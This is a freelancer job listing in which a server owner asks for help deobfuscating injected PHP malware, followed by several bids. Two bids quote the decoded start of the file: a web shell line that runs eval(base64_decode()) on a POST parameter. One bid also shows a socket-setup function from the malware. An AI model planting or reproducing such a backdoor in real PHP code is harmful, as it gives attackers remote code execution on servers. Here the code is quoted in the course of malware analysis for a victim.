Decrypt malware obcusificated php file

$2-8 USD / hour

Completed

Posted

over 8 years ago

$2-8 USD / hour

I have a few files I need decrypted that have been injected on my server and I desire to know the actual php encrypted. See attached crap code. You'll be getting a 5star review for service within 15 minutes if you know which site that can decrypt it that is :D

JavaScript

Linux

PHP

Project ID: 8498530

About the project

6 proposals

Remote project

Active 9 yrs ago

Looking to make some money?

Email address

Benefits of bidding on Freelancer

Set your budget and timeframe

Get paid for your work

Outline your proposal

It's free to sign up and bid on jobs

Awarded to:

@xpoh

Hello! I can help u with this project. What do u want to get as output? Because this scripts generates html page with javascripts. Contact me to discuss details.

$8 USD in 1 day

5.0

(10 reviews)

3.4

6 freelancers are bidding on average $21 USD/hour for this job

@dimkazakos

my price is fixed $30! here there are the first lines: <?php if (isset($_POST['nf385ab'])) { eval(base64_decode($_POST['nf385ab'])); } ?> <?php xxxxxxxxxxxxxxxxxxxxx function itwro48($z26, $xyslz28) { if (function_exists('socket_create') && function_exists('socket_connect') && function_exists('socket_read') && function_exists('socket_write')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_SOCKET')); return TRUE; } if (function_exists('fsockopen')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_FSOCKET')); return TRUE; } if (function_exists('stream_socket_client')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_STREAM')); return TRUE; } define('SOCKET_TYPE', constant('SOCKET_TYPE_NO')); return FALSE; } xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Thank you in advance.

$33 USD in 1 day

5.0

(55 reviews)

5.3

@unitmatrix

Hello, I am sorry to hear your server injection. I will be glad to help you to read the malware code contents as requested. The attached malware file is not actually encrypted or encoded because you can actually see readable php code in it, but in fact it is obfuscated which means that it is written so that it is very hard to understand as you do not see normal variables or PHP function calls because those are hidden (obfuscated). You will not find a general website that will decode/deobfuscate this for you automatically. I have analyzed the code and here is what I can do for you: I can deobfuscate this this manually for you to the extent where you can read actual PHP function calls and actual variables which will make the code look readable as usual so you can read what the hacker intended to execute on your server. However, I can not guarantee that the code will make sense or will be very easy to understand. I almost got it done for you, I just need your confirmation so I can run the final global replacements. Here is a sample of the first few lines of this file I just decoded: if (isset($_POST['nf385ab'])) { eval(base64_decode($_POST['nf385ab')) } And the code will be made tidy with proper indentations. Please let me know if you need any help, Thank you, Alex

$55 USD in 1 day